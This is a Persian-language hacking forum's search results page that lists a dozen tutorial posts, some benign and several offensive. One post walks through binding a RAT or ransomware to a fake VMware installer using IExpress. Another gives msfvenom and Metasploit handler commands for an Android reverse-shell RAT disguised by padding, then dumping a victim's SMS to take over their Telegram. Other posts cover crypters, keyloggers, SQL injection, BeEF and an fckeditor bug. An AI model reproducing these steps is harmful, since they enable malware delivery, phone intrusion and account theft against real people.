رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'اموزش هک'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

12 نتیجه پیدا شد

  1. کسب‌وکارهای سازمان یافته یکی از اهداف هکر هاست که مورد حمله آن‌ها قرار می‌گیرند. انگیزه هکر ها، درآمد است و استراتژی شان به دست آوردن آن با کمترین ریسک و بیشترین سود است. وقتی متوجه شوید که عملکرد و رفتار آن‌ها به عنوان رقیب چگونه است، می‌توانید کسب‌وکار آنها را مختل کنید تا از کسب و کار خود محافظت نمایید. هک، یک تجارت است هکرها با ریسک و هزینه خود، در کسب‌وکارهای سازمان‌یافته نفوذ می‌کنند. وقتی عملکرد هک را بشناسید، یاد می‌گیرید که هکر ها چگونه سازمان می‌یابند و چگونه درآمد کسب می‌کنند و در نتیجه می‌توانید استراتژی خود را برای شکست آنها برنامه‌ریزی کنید. موثرترین استراتژی‌های امنیتی شرکت داده های بین المللی (IDC)، تحلیل‌های خود را به اشتراک می گذارد تا بتوانید کار هکر ها را مختل کرده و شرکت خود را امن‌تر نمایید. اختلال در کار هکرها باعث بالا رفتن هزینه‌ها و کاهش درآمدشان می‌شود و آنها را مجبور می‌کند تا روش خود را تغییر دهند. برخی از محصولات IDC عبارتند از: Threat Hunting جرایم اینترنتی (رقیب ناشناس) نتایج هزینه سالیانه برای جرایم اینترنتی شناخت ریسک ها چگونه در کار هکرها اختلال ایجاد کنیم؟ برای ایجاد اختلال در کار هکرها، باید به موارد زیر توجه کنید: امنیت اطلاعات قبل از آنکه زیانی وارد شود، منافذ نفوذ را پیدا و متوقف کنید. حملات هکرها روز به روز پیچیده‌تر می‌شود. بنابراین داشتن برنامه جامع امنیتی و تیم ماهر برای ایجاد اختلال در کار هکر ها الزامی است. امنیت داده‌ها البته هرگز نخواهید توانست جلوی تمامی حملات سایبری را بگیرید اما می‌توانید داده های خود را همان لحظه که ایجاد می‌شوند، رمزنگاری کنید. امنیت اپلیکیشن آسیب‌پذیری‌های خود در نرم افزار را پیدا و برطرف کنید. هکرها تمرکز خود را به سمت اپلیکیشن‌ها تغیییر داده‌اند. بنابراین سعی کنید با استفاده از فرآیند SDLC (چرخه زندگی توسعه نرم افزاری)، اپلیکیشن‌های خود را امن‌تر کنید. جدیدترین رقیب خود را بشناسید آیا واقعا هکرها مانند شما دارای کسب‌وکار هستند؟ پاسخ مثبت است. آنها هم مانند شما دارای انگیزه‌ها و عملکردهای تجاری هستند. بنابراین اگر آنها را به چشم رقیب ببینید، می‌توانید با اختلال در کار آن‌ها از تجارت خود محافظت کنید.
  2. باسلام به کاربران عزیز anonysec با اموزش نصب میزکار Enlightenmen روی ubuntu خب اول با دستور زیر لینک پشتیبانی میزکار را به source.list اضافه میکنیم sudo add-apt-repository ppa:enlightenment-git/ppa خب بعد از اضافه شدن با دستور های زیر سیستم خود را اپدیت کنید apt-get update خب بعد از اپدیت شدن سیستم با دستور میزکار را نصب میکنیم sudo apt-get install e20 صبر کنید تا دانلود و نصب شود بعد لاگوت کرده با میزکار Enlightemen لاگین کنید باتشکر امیدوارم خوشتان بیاد این مطلب برای افرادی خوب است که قصت ساخت توضیع لینوکس هستند این میزکار بهتر است !
  3. با سلام به کاربران عزیز انونیسک در این اموزش با اموزشی کاملا متفاوت با شما هستم , در این اموزش به شما یاد میدهم که وقتی شما یک ویروسی را ساخته اید چگونه به یک setup برنامه بچسبانید شما میتوانید رات یا باج افزار خود را به انواع فایل های نصبی بچسبانید . خب بریم سراغ اموزش در این اموزش از سیستم عامل ویندوز استفاده میکنیم . خب در قسمت سرچ ویندوز iexpress بنویسید تا IEXPRESS برنامه بازشود برنامه اجرا شود خب الان NEXT را بزنید خب باز هم NEXT را بزنید به هیچ گذینه ای دست نزنید خب الان به قسمت PACKGE TITLE رسیدیم یک اسم به SETUP بگذارید مثلا من ویروس را روی فایل نصبی VMWARE میچسبانم اسم ستاپ را هم VMWARE میگذارم خب next را بزنید الان دوتا گذینه نشان میدهد شما no prompt را انتخواب کنید و next را بزنید خب ازمون میخواهد لایسنس را نشان دهد ما میگوییم خیر گذینه do not display a licence را انتخواب میکنیم و next را میزنیم خب الان به قسمت packge files میرسیم روی add کلیک کنید و فایل ویروسی و فایل نصبی را بردارید من ویروس و فایل نصبی vmware را انتخواب میکنم خب الان install program to lunch رسیدیم در این قسمت install program یعنی فایلی که میخواهید اول اجرا شود را انتخواب میکنیم بهتر است فایل نصبی را انتخواب کنیم و بعد post install command هم فایل ویروسی را انتخواب میکنیم خب الان به قسمت show windows رسیدیم در اینجا Default انتخواب میکنیم و next الان خب الان قسمت finished message هستیم و الان no message انتخواب میکنیم بعد next را میزنیم الان browser میزنیم خب محلی که میخواهیم ان جا فایلمان سیو شود را انتخواب میکنیم من desktop را انتخواب کردم خب الان file name اسمی میگذاریم من erorr میگذارم خب الان save را میزنیم و بعد next را میزنیم خب الان میگوید میخواهید ریستارت کنید یا نه ما نمیخواهیم بکنیم گذینه no restart را انتخواب میکنیم و next را میزنیم بعد روی گذینه dont save انتخواب میکنیم و بعد next را میزنیم و باز next و صبر کنید فایل اماده شود بعد از اماده شدن به تارگن خود داده , وگی او فایل را نصب کرد ویروس فعال میشود. امید وارم خوشتان امده باشد.
  4. با سلام به کاربران عزیز انونیسک امروز اموزش ساخت رات با کالی را برای افراد مبتدی نوشته ام ابتدا ترمینال کالی لینوکس را باز کنید و دستور ifconfig را بزنید تا ip خود را پیدا کنید یا در گوگل عبارت myip را سرچ کنید . خلاصه الان یک ترمینال دیگری را باز کنید در داخلش دستور زیر را بنویسی شما به جای you ip ایپی خود را بنویسید. msfvenom -p android/meterpreter/resverse_tcp LHOST=YOUip LPORT=4444 -o rat.apk خب الان یکم صبر کنید رات ساخته بشه خب الان file manger را باز کنید و رات خود را از قسمت root به گوشی خود منتقل کنید الان به ویرایش و افزایش حجم رات میپردازیم . برنامه apk editor را از گوگل پلی دانلود و نصب نمیایید . خب اول برنامه را ادیت کنید نام برنامه وایکون برنامه را عوض کنید و سیو کنید دوباره باز apk editor را باز کنید دوباره برنامه ای که ایکونش را عوض کرده اید در ادرس /apkeditor گوشی میباشد به انجا رفته و رات را انتخواب کنید الان گذینه دوم را انتخواب کنید چون کار ما الان افزایش حجم است ما در قسمت دوم یک علام فایل هست که رویش علامت + وجود دارد انرا انتخواب کنید و فایل های عکس یا فایل های 60 مگ را به داخل فایل های برنامه اضافه کنید بعد سیو کنید باز و دوباره صبر کنید سیو شود الان باز به محل /storge/apkeditor رفته و فایل خود را پیدا کنید میبینید که حجم برنامه شما 60 مگ شده است الان ان رات را به هدف خود فرستاده بعد که طرف نصب کرد بعد اجرا کرد کالی لینوکس را اجرا کنید و در ترمینال msfconsole را بنویسید تا متاسپلوییت باز شود . خب الان دستور زیر را در متاسپلوییت تایپ کنید . use multi/handler را نوشته تا اکسپلویت انتخواب شود الان با دستور زیر payload را انتخواب میکنیم set PAYLOAD android/meterpreter/reverse_tcp خب الان یک دستور show options را بنویسید و دستور set LHOST YOU IP به جای YOU IP ایپی که هنگام ساخت رات استفاده کرده اید را وارد کنید . خب بعد از SET شدن LHOST دستور RUN را تایپ کنید تا meterpreter باز شود , خب الان میتوانید با دستورات مست dump_sms اسمس های طرف را به دست اورده ویا میتوانید شمارش را در تلگرام نوشته کد ارسال شود و با دستور dump _sms پیام هارا نشان دهد و شما کد تلگرام را پیدا کرده و وارد کرده تلگرام اورا هک کنید. امید وارم خوشتان امده باشد میدانم این اموزش مبتدی هست ولی برای بعضی افراد شاید اموزش بزرگی باشد .
  5. این روز ها برنامه های تحت کنسول افزایش پیدا کرده است که بسیاری از هکر ها از اسکریپت نویسی های از جمله shell - batch - python - ruby - prel -... استفاده میکنند ولی بهتر است از زبان batch استفاده میکنند خب منم میخوام شما را با batch اشنا کنم , فرض کنید مثلا رفتید به اداره ای چیزی یا کتاب خانه ای شما میتوانید با دستگاه هایی که کتاب جست و جو میکنند هک کنید , روی دستگاه یک فایل نوت پد بسازید و کد های برنامه یا ابزار خود را توش بنویسید و با ان ابزار اقدام به زدن دیداس , یا هک کنید , من این کار را در سیستم های دانشگاه ازاد تبریز انجام دادم و موفق به هک کردن سرور ها شدم زبان batch از دستورات cmd فقط پشتیبانی میکند مثلا به تکه کد زیر دقت کنید و این را بدانید که فرمت فایل های batch به صورت .bat میباشد یعنی فقط قابل تحت اجرای داس یا cmd میباشد. @echo off echo. echo --------------------------- echo - ceat by anonysec - echo --------------------------- pause > nul ما اگر این کد را در نوت پد پیست کنید و با فرمت .bat سیو کنید . توجه به کد ها داشته باشید ما برای اینکه برنامه خود را شروع کنیم اول از دستو @echo off استفاده کرده ایم بعد برای رفتن به ستر زیر از کد echo. استفاده کردیم توجه داشته باشید اگر کد .echo را زیر echo off@ قرار ندهیم برنامه با مشکل مواجه خواهد شد برای نمایش متن هم میتوانید از کد echo استفاده کنید که اصولا این کد متن را نمایش میدهد یا print خب به هر حال و توجه داشته باشید pause > nul هم باید در اخر کد های برنامه اتان بنویسید زیرا اکر از این کد استفاده نکنید برنامه اجرا شده و خودکار پس از 1 ثانیه بسته خواهد شد , نوعی از این کد هم در زبان سی شارپ به صورت زیر بود . system.console.readkey(); ولی به جای این کد از کد ساده ای یعنی کد زیر استفاده میشود ولی باید در batch به اخر برنامه خود این کد را اضافه کنیم. pause > nul خب امید وارم خوشتان امده باشد در این قسمت با متد های متنی و متد های read key اشنا شدید انشلاه جلسه بعد با متد های دستوری set و color اشنا خواهید شد .
  6. مباحث مربوط به انواع حملاتی که ممکن است شبکه شما را دچار اختلال کند و دسته‌بندی خاص آن‎ها، امروز نوع حملات مرتبط با موضوع session hijacking و بصورت ریزتر Application-level Session Hijacking و حملات زیر شاخه آن را مورد بررسی قرار میدهیم. Application-level Session Hijacking در session hijacking attack، یک توکن معتبر از طریق پیش بینی و یا سرقت آن مورد تهدید قرار می‌گیرد که این کار به منظور بدست آوردن حق دسترسی غیر مجاز به وب سرور است. همانطور که میدانید، حمله Session Hijacking به دو طریق صورت میپذیرد؛ network-level و Application-level. با استفاده از Network-level hijacking اطلاعات مفیدی بدست می‌آید که از آن میتوان برای انجام یک حمله Application-level hijacking استفاده لازم را برد. بنابراین Network-level و Application-level hijacking در اکثر حالات با یکدیگر اتفاق می‌افتند. Application-level hijacking شامل در اختیار گرفتن کنترل یک session موجود یا ایجاد یک session جدید بر اساس اطلاعات سرقت شده توسط Network-level hijacking است. Application-level hijacking در خلال یک HTTP session رخ میدهد. HTTP session ها براحتی با لو رفتن session ID های مربوطه ( شناسه های منحصربفردشان) قابل سرقت هستند. Application-level session hijacking از راه های مختلفی میتواند یک session token را بخطر اندازد که در زیر به مهترین آن ها اشاره میکنیم: پیش بینی session token حملات Man-in-the-middle حملات Client-side (کدهای آلوده جاوا اسکریپت، XSS، تروجان و ... ) حملات Man-in-the-browser شنود Session Session Sniffing باید گفت که زمانی که ترافیک HTTP بصورت رمز نشده ارسال میشوند، انجام این روش بسیار ساده است. ترافیک HTTP ممکن است دربردارنده session ID ها باشد. مهاجمان با استفاده از شنود ارتباط، ترافیک HTTP را ضبط کرده و سپس آن را برای بدست اوردن session ID ها آنالیز میکنند. اگر ترافیک رمز نشده باشد، پیش بینی session ID ها بسیار ساده خواهد بود. گفتنی است که session رمز نشده ممکن است در دل خود اطلاعات مربوط به شناسه کاربری و پسورد را نیز داشته باشد.شکل زیر توضیحات ارائه شده را با رسم دیاگرام توضیح میدهد: در ابتدا مهاجم ترافیک HTTP بین قربانی و وب سرور را شنود، دیتای کپچر شده را آنالیز و نهایتا session ID را پیش بینی میکند. سپس مهاجم خودش را در نقش قربانی جعل کرده و session ID را قبل از آن که قربانی بتواند کاری انجام دهد، به وب سرور ارسال میکند. بنابراین مهاجم براحتی کنترل session موجود را بدست میگیرد. پیش بینی session token پیش بینی session token یا همان session ID شیوه ای از ربودن یا جعل هویت یک کاربر وب سایت است. این روش به session hijacking نیز معروف است. پایه و اساس این روش بر حدس زدن و یا ایجاد یک ارزش منحصربفرد مثل session ID ای که در احراز هویت یک کاربر یا یک session خاص کاربرد دارد، بنیان نهاده شده است. با استفاده از تکنیک session hijacking، یک مهاجم میتواند با دردست داشتن حق دسترسی یک کاربر بخطر افتاده درخواست های ping برای وب سایت مورد نظر ارسال کند.هنگامی که کاربر درخواست برقراری ارتباط را برای وب سایت ارسال کرد، وب سایت در ابتدا سعی میکند احراز هویت را انجام دهد و هویت کاربر را بررسی کند. تا زمانی که کاربر نتواند هویت خود را برای وب سایت اثبات نماید، وب سایت اطلاعات درخواست شده را به کاربر تحویل نمیدهد. وب سایت ها معمولا کاربران را بر اساس ترکیبی از شناسه کاربری و پسورد احراز هویت میکنند. پس از آن که هویت کاربر برای وب سایت محرز شد، وب سایت یک session ID منحصربفرد را برای کاربر ایجاد میکند. این session ID نشان میدهد که session ایجاد شده برای کاربر، احراز هویت شده است. به منظور تداوم هویت تائید شده کاربر برای وب سایت، session ID به ارتباط بعدی بین آندو نیز الصاق میشود. اگر مهاجم بتواند session ID را با حدس زدن و پیش بینی بدست آورد، توانسته است session ایجاد شده را بخطر بیاندازد. چگونه یک session token را پیش بینی میشود؟ اکثر وب سرورها از الگوریتم های معمول یا از پیش تغریف شده برای ایجاد session ID هایشان استفاده میکنند. این الگوریتم ها ممکن است session ID ها را براساس افزایش غیرخودکار اعداد و یا استفاده از روشهایی پیچیده تر مثل دخیل نمودن فاکتورهای زمان و دیگر متغیرها، ایجاد نمایند. هنگامی که session ID محاسبه شد، در URL، در یک فرم مخفی یا در یک کوکی ذخیره خواهد شد. در چنین مواردی، چنانچه مهاجم بتواند الگوریتم مورد استفاده را بدست آورد، براحتی مدیریت session ID را بر عهده خواهد گرفت. راه های ممکن که مهاجم بتواند حمله را ترتیب دهد ازطرق زیر امکان پذیر است: ایجاد ارتباط با نرم افزار وب و بدست آوردن session ID Brute forcing و یا محاسبه session ID بعدی تغیر مقدار فعلی session ID ذخیره شده در URL فرم مخفی کوکی با فرض هویت کاربر بعدی مهاجم session ID های متعدد را رصد کرده و سپس آن ها را به قصد پیدا کردن یک الگو، آنالیز میکند: در 25 سپتامبر 2010 و در ساعت 16:25:55، مهاجم موفق به پیش بینی session ID میشود: حملات Man-in-the-middle این حمله نوعی از حمله است که در آن مهاجمان در یک ارتباط موجود بین دو سیستم اختلال ایجاد کرده تا زنجیره پیغام های رد وبدل شده را قطع کرده و اطلاعات دلخواه خودشان را در آن تزریق کنند. در این حالت قربانی بر این گمان است که مستقیما با طرف مورد مظرش تبادل اطلاعات دارد اما واقعیت ان است که تمام اطلاعات رد و بدل شده توسط مهاجم کنترل میشود. عملکردهای مختلف این حمله شامل جاسوسی در یک ارتباط، اخلال در یک ارتباط، قطع پیغام ها و ویرایش دیتاها میباشد.در اینجا برای نمونه یک تراکنش HTTP را در نظر میگیریم. در این حالت بین کلاینت و سرور ارتباط TCP برقرار است. کاری که مهاجم انجام میدهد شکافتن این ارتباط TCP موجه به دو ارتباط مجزا با تکنیک های مختلف بین کلاینت و سرور است. این دو ارتباط مجزا ارتباط کلاینت با مهاجم و ارتباط مهاجم با سرور است. پس از قطع موفقیت آمیز ارتباط TCP، مهاجم قادر به خواندن، ویرایش و تزریق اطلاعات غلط به ارتباط قطع شده است. بخاطر ذات پروتکل HTTP و همچنین مکانیزم تبادل دیتا که همگی بر اساس ASCII هستند، حمله Man-in-the-middle بسیار موثر و کاراست. در این روش امکان مشاهده اطلاعات ترانسفر شده از طریق پروتکل HTTP وجود دارد. حملات Man-in-the-Browser این حمله شبیه حمله Man-in-the-middle است. تفاوت بین این دو تکنیک آن است که حمله Man-in-the-Browser از تروجان برای مداخله و دستکاری صحبت های رد و بدل شده بین مرورگر و مکانیزم امنیتی یا دیتابیس آن است. این حمله از تروجانی که بر روی سیستم نصب شده است برای مداخله در مرورگر و مکانیزم امنیتی آن استفاده میکند. این تکنیک قابلیت ویرایش و شنود تراکنش ها را دارد. مهمترین هدف این حمله سرقت مالی توسط دستکاری تراکنش های در بانکداری اینترنتی است. در این روش مهاجمان میتوانند اطلاعات حساس یا پول را بدون بجا گذاشتن کوچکترین اثر و یا آلارمی سرقت کنند. و تمام این ها در حالتی اتفاق میافتد که تمام تراکنش ها در بستر SSL صورت میپذیرد. تمام مکانیزم های امنیتی ظاهرا نرمال هستند. بنابراین برای پیشگیری از قربانی شدن در این حمله باید هنگام استفاده از تراکنش های اینترنتی بانک خود حساس و باهوش عمل کرد. مراحل اجرای یک حمله Man-in-the-Browser تروجان در ابتدا نرم‌افزار کامپیوتر( سیستم عامل یا اپلیکیشن) را تحت تاثیر خود قرار میدهد. بعد از آن که کاربر مرورگر را ریست کرد، کد آلوده در قالب فایل هایی بارگذاری میشود. هنگامی که وب‌پیج لود شد، فایل حاوی کد آلوده (extension)، از URL استفاده کرده و آن را با لیست سایت های تعریف شده برای حمله که از پیش برایش تعریف شده است، چک میکند. Extension هنگامی که پیج خاص لود شده با بررسی چک لیست برای حمله تائید شد، یک دکمه کنترل کننده را رجیستر میکند. تروجان کد آلوده ( فایل های extension) را نصب کرده و آن را در ساختار مرورگر ذخیره میکند. فایل های extension یک کنترل کننده را برای هر بازدید از وب پیج رجیستر میکنند. کاربر بصورت امن به وب سایت Logon میکند. مرورگر فرم و مقادیر ویرایش شده را به سرور ارسال میکند. هنگامی که کاربر بر روی دکمه کنترل کننده کلیک میکند، extension با کمک DOM interface تمام اطلاعات را از بخش های مختلف فرم بازیابی کرده و آن ها را ویرایش میکند. بعد از آن که سرور تراکنش را انجام داد، یک رسید دیجیتالی صادر میشود. مرورگر رسید دیجیتالی را با جزئیات اصلی اش نشان میدهد. سرور مقادیر تغیر داده شده را دریافت میکند اما نمیتواند بین مقادیر اصلی و ویرایش شده، تمایز قائل شود. در این صورت مرورگر رسید دیجیتالی مربوط به مقادیر اصلاح شده را دریافت میکند. کاربر فکر میکند که تراکنش انجام شده با سرور بدون هیچگونه خللی انجام شده است. حملات Client-side در این نوع حمله مهاجم سعی میکند تا از آسیب پذیری های موجود در اپلیکیشن کلاینت نهایت استفاده را برده و از طریق اجبار آن به برقراری ارتباط با سرور آلوده یا اجبار به پردازش اطلاعات آلوده به هدف خود برسد.در حالت اول یعنی هنگامی که کاربر با سرور تعامل و ارتباط برقرار میکند، شانس زیادی در اجرای این حمله وجود دارد. اگر کلاینت با سرور ارتباطی نداشته باشد، آنگاه اطلاعات آلوده نیز نمیتوانند از طرف سرور به کلاینت فرستاده شوند. بنابراین اپلیکیشن از حمله و آلودگی در امان میماند. نمونه نرم افزاری که در برابر حمله Client-side آسیب پذیر است، نرم افزارهای مربوط به ارسال پیام (چت) هستند. هنگامی که این اپلیکیشن ها ران میشوند کلاینت ها معمولا بر اساس ساختاربندی ای که شده به یک سرورِ ریموت وصل میشوند. حملات client-side از سه راه اجرایی میشوند: XSS: حملات Cross-Site scripting شیوه ای از حملات تزریقی(injection) هستند که در آن ها اسکریپت های آلوده به وب سایت‌ها تزریق میشوند. کدهای آلوده جاوا اسکریپت: مهاجم ممکن است جاوا اسکریپت های آلوده را در یک وب پیچ جا سازی نماید . شما را به بازدید از آن صفحه فریب دهد. هنگامی که شما آن صفحه را در مرورگر خود باز میکنید، اسکریپت های آلوده بصورت مخفیانه و بدون هیچگونه پیغام هشداری اجرا میشوند. تروجان‌ها: تروجان یک اپلیکیشن ناخواسته است که به ظاهر خود را موجه نشان میدهد اما هدف اصلی آن ایجاد دسترسی های بی مجوز برای مهاجمان است. حملات Cross-site Script این حملات نوعی آسیب پذیری در سیستم امنیتی کامپیوتر است. این آسیب پذیری معمولا در نرم افزارهای تحت وب یافت میشوند و از آن ها برای دور زدن کنترل دسترسی ها استفاده میشود. مهاجم Client-side Script را به صفحات وب تزریق کرده و آن ها برای حملات cross-side script به سوی قربانیان هدف ارسال میکند.در واقع این نوع حمله همان حمله Client-inside است که در آن مهاجم با ایجاد کد یا برنامه های آلوده، Session ID را بخطر میاندازد.
  7. سلام به دوستان عزیز آی‌تی پرویی و علاقه‌مندان به مباحث امنیت شبکه. session fixation به نوعی زیر مجموعه ای از حملات application-level session hijacking محسوب میشود که در بحث نوع عملکرد و اجرا اگرچه اصول خود را حفظ کرده است اما تفاوت های اشکاری با سایر روش های موجود در این نوع حملات ندارد. اما به عنوان یک متخصص امنیت شبکه باید با مفهوم و عملکرد آن آشنا باشید چرا که فقط در صورت دانستن مکانیزم اجرایی اینگونه حملات خواهید توانست تمایز موجود بین انواع روش های session hijacking را بدرستی درک کنید. Session Fixation Session fixation حمله ای است که مستقیما هدف آن ربودن session معتبر یک کاربر است. برای اجرای این حمله، مهاجم از مزیت وجود محدودیت در نرم افزارهای تحت وب در رابطه با مدیریت session ID استفاده لازم را میبرد.نرم افزار تحت وب بجای صادر کردن یک session ID جدید، به کاربر این اجازه را میدهد تا با استفاده از session ID موجود خود را احزار هویت نماید. در این حمله مهاجم با دردست داشتن یک session ID معتبر، قربانی را به استفاده از آن هدایت میکند. اگر مرورگر قربانی از این session ID استفاده کند، مهاجم با علم به این که کاربر از این session ID استفاده میکند، میتواند براحتی session اعتباردهی شده کاربر را برباید. یک حمله session fixation، نوعی از حمله session hijacking است. فرق بین این دو حمله در آن است که در حمله session hijackingحمله با استفاده از سرقت session برقرار شده پس از Login کاربر صورت میپذیرد در صورتی که حمله session fixation شروع حمله قبل از Login کاربر است. این حمله با استفاده از تکنیک های مختلفی میتواند اجرا شود. نوع تکنیک انتخاب شده توسط مهاجم بستگی به رفتار مرورگر مورد نظر با توکن های session دارد. در زیر برخی از روش های رایج در اجرای حمله session fixation آورده شده است: Session token در آرگومان URL Session token در فرم مخفی Session ID در کوکی حمله session Fixation در تکنیک HTTP header response از حمله session fixation، مهاجم مرتبا با جستجوی پاسخ های ارسالی از طرف سرور، بدنبال پیدا کردن session ID است. علاوه بر این مهاجم این امکان را نیز دارد تا session ID مورد نظر خود را با کمک پارامتر set cookie درون کوکی جای گذاری نماید. هنگامی که کوکی بصورت دلخواه تنظیم شد، مهاجم آن را بسوی مرورگر قربانی ارسال میکند. Session fixation در سه فاز انجام میشود: مرحله برقراری و ایجاد session ID: در این فاز مهاجم نخست یک session ID معتبر را با استفاده از برقراری ارتباط با نرم افزار تحت وب، بدست میآورد. تعداد کمی نرم افزار تحت وب وجود دارد که قابلیت session time-out را پشتبانی کنند. از این رو مهاجم با بدست آوردن session ID محدودیت زمانی برای اجرای حمله نخواهد داشت. در آندسته از نرم افزارخای تحن وبی که این قابلیت را پشتیبانی میکنند، مهاجم باید مرتبا و پیوسته درخواست هایی را به منظور تمدید و زنده نگهداشتن session ارسال نماید. مرحله تثبیت (fixation): در این فاز مهاجم session ID را درون مرورگر قربانی وارد میکند و session را تثبیت مینماید. مرحله ورود (Entrance): در این فاز مهاجم منتظر میماند تا کاربر با استفاده از session ID تله گذاری شده به وب سرور login کند. فرض کنید که قربانی میخواهد از خدمات اینترنتی بانک استفاده کند. همچنین فرض کنید که آدرس بانک مورد نظر HTTP://citibank.com باشد. مهاجم اگر بخواهد که این session را تثبیت نماید باید مراحل گفته شده در زیر را انجام دهد: ابتدا مهاجم بایستی با استفاده از یک اعتبار کاربری به وب سایت بانک login کند. سپس HTTP://citibank.com یک session ID برای آن صادر میکند. ( 0D6441FEA4496C2) مهاجم session ID را درون لینکی آلوده جای گذاری کرده (HTTP://citibank.com/? SID=0D6441FEA4496C2) و آن را بسوی قربانی ارسال میکند و با ترفند کاربر را به کلیک بر روی لینک آلوده ترغیب خواهد کرد. هنگامی که قربانی بر روی لینک مورد نظر با فرض این که لینک معتبر برای ورود به سایت بانک است، کلیک کرد، مستقیما با session ID مورد نظر مهاجم وارد سایت بانک میشود. (0D64441FEA4496C2) وب سرور بانک با بررسی session ID مورد نظر متوجه میشود که این session از پیش برقرار شده و حالت فعال دارد؛ بنابراین دیگر نیازی به صدور یک session ID جدید نمیبیند. حالا مهاجم میتواند با استفاده از session ID معتبر خودش و کاربری شخص قربانی، دست به اعمال مجرمانه خود بزند. برای جمع بندی این نوع حمله، میتوان گفت که در این روش، قربانی با استفاده از session ای که از پیش مهاجم آماده کرده است، login میکند.
  8. #بازگردانی تاحالا شده جیمیلی ساخته باشید و اصلا یادتون نباشه چی بوده؟ در این اموزش شما می تونید جیمیلی که قبلا ساختید رو براحتی پیدا کنید. اولین قدم وارد شدن در این سایت هست : Google Accounts وارد سایت که شدید گزینه Enter your recovery phone number را انتخاب کنید بعد اون شماره ای که باهاش جیمیلتون رو ساخته بودید وارد کنید ( کد کشور رو هم به ایران تغییر بدید ) در پایین تر تیک رو بزنید Receive via: a text message (SMS و همینطور در پایین در قسمت Enter the name on the account در قسمت First: اسمتون که واسه جیمیل وارد کردید رو بزنید Last : در ایست قسمت هم فامیل که واسه ساخت کانت زدید رو وارد کنید مثلا اگر اسم منAlisecuritg هست بالا رو ali و بعدیش رو security وارد میکنم و در اخر هم تیک i am not Robot رو میزنید که بعدش یه سری سوال میاد مثلا نوشته Select all images with trees یعدی هر چی عکس که توش درخت هست رو انتخاب کنید شما هم همین کار رو انجام می دید و گزینه Verify واستون میاد بعد که این مرحله تمام شد گزینه Sumbit رو میزنید و کدی واسه موبایلتون پیامک میشه . اون کد رو توی مرورگر وارد کنید و بعد تمام جیمیل هایی که شما با اون شماره ساختید رو بهتون نشون میده .
  9. درود خدمت کاربران عزیز ✔️بایند و بایندر(Bind) به ترکیب کردن یک بد افزار با نرم افزاری دیگه رو بایند و ابزاری ک این کار یاش انجام میشه رو بایندر میگن ✔️کریپت و کریپتر (Crypt) مجموعه راهکارهایی ک انجام میدیم تا بدافزار ما از دید انتی ویروس مخفی بماند به ابزاری ک این کار رو انجام میده کریپتور گفته میشه ✔️کیلاگر(Keylogger) نوعی ابزار جاسوسی که همونطور ک از اسمش پیداست کارش جاسوسی از کلید های فشرده شده روی صفحه کلید توسط هدف هس. بزودی اموزش ساخت کیلاگر هم اموزش خواهیدم داد ✔️تروجان(Trojan) تروجان یک فایل ویروسی است که هکر با توجه به نیازی که از هک دارد، آماده می کند و به قربانی میدهد اموزش ساخت این ویروس بزودی بطور اختصاصی در کانال قرار خواهد گرفت ✔️تارگت(Target) تارگت به معنی هدف. سیستمی که قراره مورد نفوذ قرار بگیره
  10. darwvin

    Hacking SQL Injection part2

    در این روز خسته کننده من میخوام sqli دستی رو به صورت کامل توضیح بدم SQLi { SQL Injection } sqli یک تکنیک تزریق کد دارد. برای وب سایت هایی که به این باگ اسیب پذیرند با استفاده از این اسیب پذیری میتوانید اطلاعات مهم را بهره برداری کنید این اطلاعات میتواند یوزرها و پسورد ها باشند که میتوان با آن ها کار های بسیار کردبه عنوان مثال با دریافت یوزر و پسورد ادمین میتوان شل اپلود کرد و سایت را دیفیس کرد تصور کنید یک دستور به پایگاه داده sql ارسال کنید تا کاری که شما میخواهید را انجام دهد: SELECT، INSERT، UPDATE و بهترین دوست من drop. به عنوان مثال دستور زیر پایگاه داده با ورودی کاربر مورد نظر را بدون ف/ی/ل/ت/ر نمایش میده SELECT FROM `users` WHERE `username` = 'sky'
  11. درود! در اینجا من میخواهم اموزش هک گوشی را بدهم این روش دسترسی پایینی دارد( فقط کش های مرورگر) اما برای بعضی از موقعیت ها ما میتوانیم فقط با داشتم کش ها کار های بسیاری انجام بدیم این روش با ابزار beEF انجام میشود این ابزار به صورت خودکار در سیستم عامل کالی نصب شده است این ابزار را میتوان مشابه metasploit اجرا کرد . BeEF یک چارچوب برای حملات است. در BeEF یک قابلیت برای هک مرورگر های وب وجود دارد به طور کلی ابزار BeEF برای حملات injeckt مثل حملات (XSS) و اسیب پذیری مرورگرها و تست آنها ساخته شده
  12. best_h4cker

    Hacking-Bugs اموزش باگه fckeditor

    دوستان عزیز اولین قدم برای هک وبسایت این باگ هست که فایلشو واستون قرار دادم و میتونید راحت استفاده کنید . به زودی باگ های سخت تر و پیشرفته تر رو اموزش میدم . پسورد فایل اموزشی : anonysec ایدی کانال تلگرام : @anonysec اولین قدم برای هک سایت.rar
×
×
  • جدید...